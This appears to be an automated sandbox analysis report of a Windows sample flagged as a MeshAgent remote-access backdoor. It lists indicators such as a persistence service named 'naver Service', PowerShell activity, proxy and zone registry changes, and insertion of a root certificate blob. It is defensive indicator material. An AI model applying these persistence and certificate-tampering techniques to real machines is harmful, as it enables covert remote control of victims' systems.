Malware Analysis Report

2024-10-23 20:21

Sample ID 240924-d2aa5sshjj
Target 2024-09-24_4dfdae8af85639b2c395c7b10c6bf896_hijackloader_poet-rat_snatch
SHA256 b01fbd9f1842d5d983b203735b87bc646e3a332d6d975f6e4d05e11a346691bf
Tags
meshagent backdoor discovery execution persistence rat trojan
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

b01fbd9f1842d5d983b203735b87bc646e3a332d6d975f6e4d05e11a346691bf

Threat Level: Known bad

The file 2024-09-24_4dfdae8af85639b2c395c7b10c6bf896_hijackloader_poet-rat_snatch was found to be: Known bad.

Malicious Activity Summary

meshagent backdoor discovery execution persistence rat trojan

MeshAgent

Detects MeshAgent payload

Sets service image path in registry

Blocklisted process makes network request

Command and Scripting Interpreter: PowerShell

Executes dropped EXE

Checks installed software on the system

Drops file in System32 directory

Unsigned PE

Suspicious use of WriteProcessMemory

Suspicious behavior: EnumeratesProcesses

Modifies system certificate store

Suspicious use of AdjustPrivilegeToken

Modifies data under HKEY_USERS

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-09-24 03:29

Signatures

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-09-24 03:29

Reported

2024-09-24 03:32

Platform

win7-20240903-en

Max time kernel

119s

Max time network

120s

Command Line

"C:\Users\Admin\AppData\Local\Temp\2024-09-24_4dfdae8af85639b2c395c7b10c6bf896_hijackloader_poet-rat_snatch.exe"

Signatures

N/A

Processes

C:\Users\Admin\AppData\Local\Temp\2024-09-24_4dfdae8af85639b2c395c7b10c6bf896_hijackloader_poet-rat_snatch.exe

"C:\Users\Admin\AppData\Local\Temp\2024-09-24_4dfdae8af85639b2c395c7b10c6bf896_hijackloader_poet-rat_snatch.exe"

Network

N/A

Files

N/A

Analysis: behavioral2

Detonation Overview

Submitted

2024-09-24 03:29

Reported

2024-09-24 03:32

Platform

win10v2004-20240802-en

Max time kernel

124s

Max time network

138s

Command Line

"C:\Users\Admin\AppData\Local\Temp\2024-09-24_4dfdae8af85639b2c395c7b10c6bf896_hijackloader_poet-rat_snatch.exe"

Signatures

Detects MeshAgent payload

Description Indicator Process Target
N/A N/A N/A N/A

MeshAgent

rat trojan backdoor meshagent

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Sets service image path in registry

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\naver Service\ImagePath = "\"C:\\Users\\Admin\\AppData\\Local\\naver\\naver.exe\" --meshServiceName=\"naver Service\"" C:\Users\Admin\AppData\Local\naver\naver.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\naver\naver.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\naver\naver.exe N/A

Checks installed software on the system

discovery

Drops file in System32 directory

Description Indicator Process Target
File opened for modification C:\Windows\System32\rpcrt4.pdb C:\Users\Admin\AppData\Local\naver\naver.exe N/A
File opened for modification C:\Windows\System32\symbols\dll\shell32.pdb C:\Users\Admin\AppData\Local\naver\naver.exe N/A
File opened for modification C:\Windows\System32\dll\shcore.pdb C:\Users\Admin\AppData\Local\naver\naver.exe N/A
File opened for modification C:\Windows\System32\symbols\exe\MeshService64.pdb C:\Users\Admin\AppData\Local\naver\naver.exe N/A
File opened for modification C:\Windows\System32\ntdll.pdb C:\Users\Admin\AppData\Local\naver\naver.exe N/A
File opened for modification C:\Windows\System32\dll\comctl32.pdb C:\Users\Admin\AppData\Local\naver\naver.exe N/A
File opened for modification C:\Windows\System32\dll\Kernel.Appcore.pdb C:\Users\Admin\AppData\Local\naver\naver.exe N/A
File opened for modification C:\Windows\System32\symbols\dll\ole32.pdb C:\Users\Admin\AppData\Local\naver\naver.exe N/A
File opened for modification C:\Windows\System32\dbghelp.pdb C:\Users\Admin\AppData\Local\naver\naver.exe N/A
File opened for modification C:\Windows\System32\gdiplus.pdb C:\Users\Admin\AppData\Local\naver\naver.exe N/A
File opened for modification C:\Windows\System32\ncrypt.pdb C:\Users\Admin\AppData\Local\naver\naver.exe N/A
File opened for modification C:\Windows\System32\dll\kernelbase.pdb C:\Users\Admin\AppData\Local\naver\naver.exe N/A
File opened for modification C:\Windows\System32\crypt32.pdb C:\Users\Admin\AppData\Local\naver\naver.exe N/A
File opened for modification C:\Windows\System32\symbols\dll\crypt32.pdb C:\Users\Admin\AppData\Local\naver\naver.exe N/A
File opened for modification C:\Windows\System32\dll\msvcp_win.pdb C:\Users\Admin\AppData\Local\naver\naver.exe N/A
File opened for modification C:\Windows\System32\Kernel.Appcore.pdb C:\Users\Admin\AppData\Local\naver\naver.exe N/A
File opened for modification C:\Windows\System32\dll\msvcrt.pdb C:\Users\Admin\AppData\Local\naver\naver.exe N/A
File opened for modification C:\Windows\System32\symbols\dll\combase.pdb C:\Users\Admin\AppData\Local\naver\naver.exe N/A
File opened for modification C:\Windows\System32\symbols\DLL\dbgcore.pdb C:\Users\Admin\AppData\Local\naver\naver.exe N/A
File opened for modification C:\Windows\System32\dll\ws2_32.pdb C:\Users\Admin\AppData\Local\naver\naver.exe N/A
File opened for modification C:\Windows\System32\symbols\dll\rpcrt4.pdb C:\Users\Admin\AppData\Local\naver\naver.exe N/A
File opened for modification C:\Windows\System32\symbols\dll\win32u.pdb C:\Users\Admin\AppData\Local\naver\naver.exe N/A
File opened for modification C:\Windows\System32\gdi32full.pdb C:\Users\Admin\AppData\Local\naver\naver.exe N/A
File opened for modification C:\Windows\System32\symbols\dll\dbghelp.pdb C:\Users\Admin\AppData\Local\naver\naver.exe N/A
File opened for modification C:\Windows\System32\dll\gdiplus.pdb C:\Users\Admin\AppData\Local\naver\naver.exe N/A
File opened for modification C:\Windows\System32\symbols\DLL\bcrypt.pdb C:\Users\Admin\AppData\Local\naver\naver.exe N/A
File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\System32\kernel32.pdb C:\Users\Admin\AppData\Local\naver\naver.exe N/A
File opened for modification C:\Windows\System32\dll\rpcrt4.pdb C:\Users\Admin\AppData\Local\naver\naver.exe N/A
File opened for modification C:\Windows\System32\ucrtbase.pdb C:\Users\Admin\AppData\Local\naver\naver.exe N/A
File opened for modification C:\Windows\System32\advapi32.pdb C:\Users\Admin\AppData\Local\naver\naver.exe N/A
File opened for modification C:\Windows\System32\symbols\dll\ncrypt.pdb C:\Users\Admin\AppData\Local\naver\naver.exe N/A
File opened for modification C:\Windows\System32\symbols\dll\ntasn1.pdb C:\Users\Admin\AppData\Local\naver\naver.exe N/A
File opened for modification C:\Windows\System32\symbols\dll\Kernel.Appcore.pdb C:\Users\Admin\AppData\Local\naver\naver.exe N/A
File opened for modification C:\Windows\System32\bcryptprimitives.pdb C:\Users\Admin\AppData\Local\naver\naver.exe N/A
File opened for modification C:\Windows\System32\symbols\DLL\kernel32.pdb C:\Users\Admin\AppData\Local\naver\naver.exe N/A
File opened for modification C:\Windows\System32\kernelbase.pdb C:\Users\Admin\AppData\Local\naver\naver.exe N/A
File opened for modification C:\Windows\System32\symbols\dll\ucrtbase.pdb C:\Users\Admin\AppData\Local\naver\naver.exe N/A
File opened for modification C:\Windows\System32\dll\win32u.pdb C:\Users\Admin\AppData\Local\naver\naver.exe N/A
File opened for modification C:\Windows\system32\config\systemprofile\AppData\Roaming\Microsoft\SystemCertificates\My\Keys C:\Users\Admin\AppData\Local\naver\naver.exe N/A
File opened for modification C:\Windows\System32\DLL\iphlpapi.pdb C:\Users\Admin\AppData\Local\naver\naver.exe N/A
File opened for modification C:\Windows\System32\symbols\dll\kernelbase.pdb C:\Users\Admin\AppData\Local\naver\naver.exe N/A
File opened for modification C:\Windows\System32\win32u.pdb C:\Users\Admin\AppData\Local\naver\naver.exe N/A
File opened for modification C:\Windows\System32\symbols\dll\gdi32full.pdb C:\Users\Admin\AppData\Local\naver\naver.exe N/A
File opened for modification C:\Windows\System32\dll\dbghelp.pdb C:\Users\Admin\AppData\Local\naver\naver.exe N/A
File opened for modification C:\Windows\System32\ntasn1.pdb C:\Users\Admin\AppData\Local\naver\naver.exe N/A
File opened for modification C:\Windows\System32\dll\ntasn1.pdb C:\Users\Admin\AppData\Local\naver\naver.exe N/A
File opened for modification C:\Windows\System32\dll\user32.pdb C:\Users\Admin\AppData\Local\naver\naver.exe N/A
File opened for modification C:\Windows\System32\symbols\dll\user32.pdb C:\Users\Admin\AppData\Local\naver\naver.exe N/A
File opened for modification C:\Windows\System32\symbols\dll\sechost.pdb C:\Users\Admin\AppData\Local\naver\naver.exe N/A
File opened for modification C:\Windows\System32\symbols\dll\comctl32.pdb C:\Users\Admin\AppData\Local\naver\naver.exe N/A
File opened for modification C:\Windows\System32\exe\MeshService64.pdb C:\Users\Admin\AppData\Local\naver\naver.exe N/A
File opened for modification C:\Windows\System32\iphlpapi.pdb C:\Users\Admin\AppData\Local\naver\naver.exe N/A
File opened for modification C:\Windows\System32\symbols\DLL\iphlpapi.pdb C:\Users\Admin\AppData\Local\naver\naver.exe N/A
File opened for modification C:\Windows\System32\DLL\dbgcore.pdb C:\Users\Admin\AppData\Local\naver\naver.exe N/A
File opened for modification C:\Windows\system32\config\systemprofile\AppData\Roaming\Microsoft\SystemCertificates\My\Certificates\ACF87FF98E1EEF3E8BDBF7A9EB64B06CF2BDE3D5 C:\Users\Admin\AppData\Local\naver\naver.exe N/A
File opened for modification C:\Windows\System32\MeshService64.pdb C:\Users\Admin\AppData\Local\naver\naver.exe N/A
File opened for modification C:\Windows\System32\symbols\dll\advapi32.pdb C:\Users\Admin\AppData\Local\naver\naver.exe N/A
File opened for modification C:\Windows\System32\symbols\dll\msvcrt.pdb C:\Users\Admin\AppData\Local\naver\naver.exe N/A
File opened for modification C:\Windows\System32\shcore.pdb C:\Users\Admin\AppData\Local\naver\naver.exe N/A
File opened for modification C:\Windows\System32\dll\shell32.pdb C:\Users\Admin\AppData\Local\naver\naver.exe N/A
File created C:\Windows\system32\config\systemprofile\AppData\Roaming\Microsoft\SystemCertificates\My\Keys\F33F806F032136DC54AFC3EA1B57FBCB325C22E0 C:\Users\Admin\AppData\Local\naver\naver.exe N/A
File created C:\Windows\system32\config\systemprofile\AppData\Roaming\Microsoft\SystemCertificates\My\Certificates\0BAF0E556ED1305266A37277DFD1935DBD98B214 C:\Users\Admin\AppData\Local\naver\naver.exe N/A
File opened for modification C:\Windows\System32\dll\ucrtbase.pdb C:\Users\Admin\AppData\Local\naver\naver.exe N/A

Modifies data under HKEY_USERS

Description Indicator Process Target
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" C:\Users\Admin\AppData\Local\naver\naver.exe N/A
Key created \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry C:\Users\Admin\AppData\Local\naver\naver.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133716222161613689" C:\Users\Admin\AppData\Local\naver\naver.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" C:\Users\Admin\AppData\Local\naver\naver.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" C:\Users\Admin\AppData\Local\naver\naver.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" C:\Users\Admin\AppData\Local\naver\naver.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Modifies system certificate store

evasion spyware trojan
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8 C:\Users\Admin\AppData\Local\Temp\2024-09-24_4dfdae8af85639b2c395c7b10c6bf896_hijackloader_poet-rat_snatch.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8\Blob = 0400000001000000100000000cd2f9e0da1773e9ed864da5e370e74e14000000010000001400000079b459e67bb6e5e40173800888c81a58f6e99b6e030000000100000014000000cabd2a79a1076a31f21d253635cb039d4329a5e80f00000001000000200000003f0411ede9c4477057d57e57883b1f205b20cdc0f3263129b1ee0269a2678f631900000001000000100000002fe1f70bb05d7c92335bc5e05b984da620000000010000006f0500003082056b30820353a0030201020211008210cfb0d240e3594463e0bb63828b00300d06092a864886f70d01010b0500304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f74205831301e170d3135303630343131303433385a170d3335303630343131303433385a304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f7420583130820222300d06092a864886f70d01010105000382020f003082020a0282020100ade82473f41437f39b9e2b57281c87bedcb7df38908c6e3ce657a078f775c2a2fef56a6ef6004f28dbde68866c4493b6b163fd14126bbf1fd2ea319b217ed1333cba48f5dd79dfb3b8ff12f1219a4bc18a8671694a66666c8f7e3c70bfad292206f3e4c0e680aee24b8fb7997e94039fd347977c99482353e838ae4f0a6f832ed149578c8074b6da2fd0388d7b0370211b75f2303cfa8faeddda63abeb164fc28e114b7ecf0be8ffb5772ef4b27b4ae04c12250c708d0329a0e15324ec13d9ee19bf10b34a8c3f89a36151deac870794f46371ec2ee26f5b9881e1895c34796c76ef3b906279e6dba49a2f26c5d010e10eded9108e16fbb7f7a8f7c7e50207988f360895e7e237960d36759efb0e72b11d9bbc03f94905d881dd05b42ad641e9ac0176950a0fd8dfd5bd121f352f28176cd298c1a80964776e4737baceac595e689d7f72d689c50641293e593edd26f524c911a75aa34c401f46a199b5a73a516e863b9e7d72a712057859ed3e5178150b038f8dd02f05b23e7b4a1c4b730512fcc6eae050137c439374b3ca74e78e1f0108d030d45b7136b407bac130305c48b7823b98a67d608aa2a32982ccbabd83041ba2830341a1d605f11bc2b6f0a87c863b46a8482a88dc769a76bf1f6aa53d198feb38f364dec82b0d0a28fff7dbe21542d422d0275de179fe18e77088ad4ee6d98b3ac6dd27516effbc64f533434f0203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e0416041479b459e67bb6e5e40173800888c81a58f6e99b6e300d06092a864886f70d01010b05000382020100551f58a9bcb2a850d00cb1d81a6920272908ac61755c8a6ef882e5692fd5f6564bb9b8731059d321977ee74c71fbb2d260ad39a80bea17215685f1500e59ebcee059e9bac915ef869d8f8480f6e4e99190dc179b621b45f06695d27c6fc2ea3bef1fcfcbd6ae27f1a9b0c8aefd7d7e9afa2204ebffd97fea912b22b1170e8ff28a345b58d8fc01c954b9b826cc8a8833894c2d843c82dfee965705ba2cbbf7c4b7c74e3b82be31c822737392d1c280a43939103323824c3c9f86b255981dbe29868c229b9ee26b3b573a82704ddc09c789cb0a074d6ce85d8ec9efceabc7bbb52b4e45d64ad026cce572ca086aa595e315a1f7a4edc92c5fa5fbffac28022ebed77bbbe3717b9016d3075e46537c3707428cd3c4969cd599b52ae0951a8048ae4c3907cecc47a452952bbab8fbadd233537de51d4d6dd5a1b1c7426fe64027355ca328b7078de78d3390e7239ffb509c796c46d5b415b3966e7e9b0c963ab8522d3fd65be1fb08c284fe24a8a389daac6ae1182ab1a843615bd31fdc3b8d76f22de88d75df17336c3d53fb7bcb415fffdca2d06138e196b8ac5d8b37d775d533c09911ae9d41c1727584be0241425f67244894d19b27be073fb9b84f817451e17ab7ed9d23e2bee0d52804133c31039edd7a6c8fc60718c67fde478e3f289e0406cfa5543477bdec899be91743df5bdb5ffe8e1e57a2cd409d7e6222dade1827 C:\Users\Admin\AppData\Local\Temp\2024-09-24_4dfdae8af85639b2c395c7b10c6bf896_hijackloader_poet-rat_snatch.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8\Blob = 5c0000000100000004000000001000001900000001000000100000002fe1f70bb05d7c92335bc5e05b984da60f00000001000000200000003f0411ede9c4477057d57e57883b1f205b20cdc0f3263129b1ee0269a2678f63030000000100000014000000cabd2a79a1076a31f21d253635cb039d4329a5e814000000010000001400000079b459e67bb6e5e40173800888c81a58f6e99b6e0400000001000000100000000cd2f9e0da1773e9ed864da5e370e74e20000000010000006f0500003082056b30820353a0030201020211008210cfb0d240e3594463e0bb63828b00300d06092a864886f70d01010b0500304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f74205831301e170d3135303630343131303433385a170d3335303630343131303433385a304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f7420583130820222300d06092a864886f70d01010105000382020f003082020a0282020100ade82473f41437f39b9e2b57281c87bedcb7df38908c6e3ce657a078f775c2a2fef56a6ef6004f28dbde68866c4493b6b163fd14126bbf1fd2ea319b217ed1333cba48f5dd79dfb3b8ff12f1219a4bc18a8671694a66666c8f7e3c70bfad292206f3e4c0e680aee24b8fb7997e94039fd347977c99482353e838ae4f0a6f832ed149578c8074b6da2fd0388d7b0370211b75f2303cfa8faeddda63abeb164fc28e114b7ecf0be8ffb5772ef4b27b4ae04c12250c708d0329a0e15324ec13d9ee19bf10b34a8c3f89a36151deac870794f46371ec2ee26f5b9881e1895c34796c76ef3b906279e6dba49a2f26c5d010e10eded9108e16fbb7f7a8f7c7e50207988f360895e7e237960d36759efb0e72b11d9bbc03f94905d881dd05b42ad641e9ac0176950a0fd8dfd5bd121f352f28176cd298c1a80964776e4737baceac595e689d7f72d689c50641293e593edd26f524c911a75aa34c401f46a199b5a73a516e863b9e7d72a712057859ed3e5178150b038f8dd02f05b23e7b4a1c4b730512fcc6eae050137c439374b3ca74e78e1f0108d030d45b7136b407bac130305c48b7823b98a67d608aa2a32982ccbabd83041ba2830341a1d605f11bc2b6f0a87c863b46a8482a88dc769a76bf1f6aa53d198feb38f364dec82b0d0a28fff7dbe21542d422d0275de179fe18e77088ad4ee6d98b3ac6dd27516effbc64f533434f0203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e0416041479b459e67bb6e5e40173800888c81a58f6e99b6e300d06092a864886f70d01010b05000382020100551f58a9bcb2a850d00cb1d81a6920272908ac61755c8a6ef882e5692fd5f6564bb9b8731059d321977ee74c71fbb2d260ad39a80bea17215685f1500e59ebcee059e9bac915ef869d8f8480f6e4e99190dc179b621b45f06695d27c6fc2ea3bef1fcfcbd6ae27f1a9b0c8aefd7d7e9afa2204ebffd97fea912b22b1170e8ff28a345b58d8fc01c954b9b826cc8a8833894c2d843c82dfee965705ba2cbbf7c4b7c74e3b82be31c822737392d1c280a43939103323824c3c9f86b255981dbe29868c229b9ee26b3b573a82704ddc09c789cb0a074d6ce85d8ec9efceabc7bbb52b4e45d64ad026cce572ca086aa595e315a1f7a4edc92c5fa5fbffac28022ebed77bbbe3717b9016d3075e46537c3707428cd3c4969cd599b52ae0951a8048ae4c3907cecc47a452952bbab8fbadd233537de51d4d6dd5a1b1c7426fe64027355ca328b7078de78d3390e7239ffb509c796c46d5b415b3966e7e9b0c963ab8522d3fd65be1fb08c284fe24a8a389daac6ae1182ab1a843615bd31fdc3b8d76f22de88d75df17336c3d53fb7bcb415fffdca2d06138e196b8ac5d8b37d775d533c09911ae9d41c1727584be0241425f67244894d19b27be073fb9b84f817451e17ab7ed9d23e2bee0d52804133c31039edd7a6c8fc60718c67fde478e3f289e0406cfa5543477bdec899be91743df5bdb5ffe8e1e57a2cd409d7e6222dade1827 C:\Users\Admin\AppData\Local\Temp\2024-09-24_4dfdae8af85639b2c395c7b10c6bf896_hijackloader_poet-rat_snatch.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
